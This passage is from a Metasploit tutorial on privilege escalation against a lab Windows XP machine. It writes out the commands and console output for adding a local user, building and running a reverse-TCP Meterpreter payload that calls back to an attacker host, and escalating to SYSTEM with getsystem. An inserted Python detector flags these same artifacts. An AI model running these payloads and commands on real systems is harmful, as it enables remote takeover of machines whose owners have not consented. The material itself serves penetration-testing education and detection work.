Privilege Escalation

Now that we have access to the system, we can create a normal user account with limited permissions using the net user command. We’ll create a new user account to demonstrate how to elevate permissions as that user. (You will learn more about this in Chapter 8.)

When we compromise a limited user account, we will run into restrictions that prevent us from executing commands that require administrative-level permissions. By elevating an account’s permissions, we overcome that restriction.

On a Windows XP target machine, we enter the following command:

C:\Documents and Settings\Administrator>net user bob password123 /add

Next, we create a Meterpreter-based payload, payload.exe, copy it to the target’s XP machine, and run it under the user account bob. This will be our new limited user account. In this example, we will use msfpayload to create a Meterpreter-based payload as a normal Windows executable. (We’ll discuss msfpayload in more detail in Chapter 7.)

root@bt:/opt/framework3/msf3# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 X > payload.exe
root@bt:/opt/framework3/msf3# msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.33.129 LPORT=443 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.33.129:443
[*] Starting the payload handler...
[*] Sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.33.129:443 -> 192.168.33.130:1056)
meterpreter > getuid
Server username: IHAZSECURITY\bob

The LHOST and LPORT options tell Metasploit that when it creates our Meterpreter payload it should connect back to our attacker machine on port 443. We then call the msfcli interface to start a listener handler for us. This listener handler will wait for connections, and when one is received, it will spawn a Meterpreter shell.

On the attacker machine, we create a new Meterpreter stand-alone executable, copy the executable to the Windows XP machine, and run it under the user account bob.

We then set up a listener to wait for the Meterpreter connection. After the target executes the payload (payload.exe) on the system, we see a limited user Meterpreter console. In other words, we generate payload.exe on a Back|Track machine, copy the executable to a Windows XP machine, and set up a listener to obtain a Meterpreter session.

As shown in the next listing, we drop to a Meterpreter shell and enter net user bob; we can see that user bob is a member of the Users group, is not an administrator, and has limited rights. We have a limited footprint from which to attack this device, and we can’t perform certain attacks, such as dumping the SAM database to extract usernames and passwords. (Luckily, Meterpreter has us covered, as you’ll see in a moment.) Our query complete, we press ctrl-Z, which backgrounds our Meterpreter session and keeps us in the exploited system.
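As an added defender-side example (not from the book), the following Python sketch correlates the artifacts the procedure above leaves behind: a process-creation record whose command line is `net user <name> <password> /add`, the matching Windows Security event 4720 (account created), and a Sysmon network event (ID 3) where a process that is not a known TLS client connects out to port 443, as payload.exe does here. The event records are constructed JSON lines that use the Windows Security and Sysmon EventData field names; the allowlist of TLS clients is an assumption to be tuned per environment.

```python
import json
import re

# Matches "net user <name> <password> /add" (also net1.exe / net.exe forms).
NET_USER_ADD = re.compile(r"\bnet(?:1)?(?:\.exe)?\s+user\s+(\S+)\s+\S+\s+/add\b", re.I)

# Assumed allowlist of processes expected to speak TLS on 443; tune per host.
KNOWN_TLS_CLIENTS = {"iexplore.exe", "firefox.exe", "chrome.exe", "svchost.exe"}

# Constructed sample events (JSON lines) mirroring the scenario in the text.
SAMPLE_EVENTS = r"""
{"EventID": 4688, "SubjectUserName": "Administrator", "CommandLine": "net user bob password123 /add"}
{"EventID": 4720, "SubjectUserName": "Administrator", "TargetUserName": "bob"}
{"EventID": 4720, "SubjectUserName": "Administrator", "TargetUserName": "svc_backup"}
{"EventID": 4688, "SubjectUserName": "bob", "CommandLine": "C:\\Documents and Settings\\bob\\payload.exe"}
{"EventID": 3, "User": "IHAZSECURITY\\bob", "Image": "C:\\Documents and Settings\\bob\\payload.exe", "DestinationIp": "192.168.33.129", "DestinationPort": 443}
{"EventID": 3, "User": "IHAZSECURITY\\alice", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "DestinationIp": "10.0.0.5", "DestinationPort": 443}
"""


def detect(lines):
    """Return (rule, detail) findings over JSON-line events, in event order."""
    events = [json.loads(l) for l in lines.splitlines() if l.strip()]
    findings = []
    created_by_cmd = set()  # account names seen in a "net user ... /add" command line
    for e in events:
        eid = e.get("EventID")
        if eid == 4688:
            m = NET_USER_ADD.search(e.get("CommandLine", ""))
            if m:
                created_by_cmd.add(m.group(1).lower())
                findings.append(("local_account_add_cmd",
                                 f"{e['SubjectUserName']} ran: {e['CommandLine']}"))
        elif eid == 4720:
            # Tie the audit event back to the command that produced it, if any.
            name = e.get("TargetUserName", "").lower()
            tag = "corroborated" if name in created_by_cmd else "unexplained"
            findings.append(("local_account_created", f"{name} ({tag})"))
        elif eid == 3 and e.get("DestinationPort") == 443:
            image = e.get("Image", "").rsplit("\\", 1)[-1].lower()
            if image not in KNOWN_TLS_CLIENTS:
                findings.append(("unexpected_443_client",
                                 f"{e['User']} via {image} -> {e['DestinationIp']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```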

meterpreter > shell
Process 2896 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\>net user bob

. . . SNIP . . .

Local Group Memberships      *Users
Global Group memberships     *None
The command completed successfully.
C:\>^Z
Background channel 1? [y/N]  y

Note

Here’s another Meterpreter trick: While you’re in the Meterpreter console, enter background to jump back into msfconsole and leave the session running. Then enter sessions -l to list sessions and sessions -i sessionid to return to your Meterpreter console.

Now let’s get administrative or SYSTEM rights. As shown in the next listing, we enter use priv to load the priv extension, which gives us access to the privileged module (it may already be loaded). Next, we enter getsystem in an attempt to elevate our privilege to that of local system, or administrator. We then verify that we have admin privileges with the getuid command. The server username returned is NT AUTHORITY\SYSTEM, which tells us that we’ve succeeded at gaining administrator access.

meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

To switch back to the previous user account where we initially got our Meterpreter shell, we’d use rev2self.
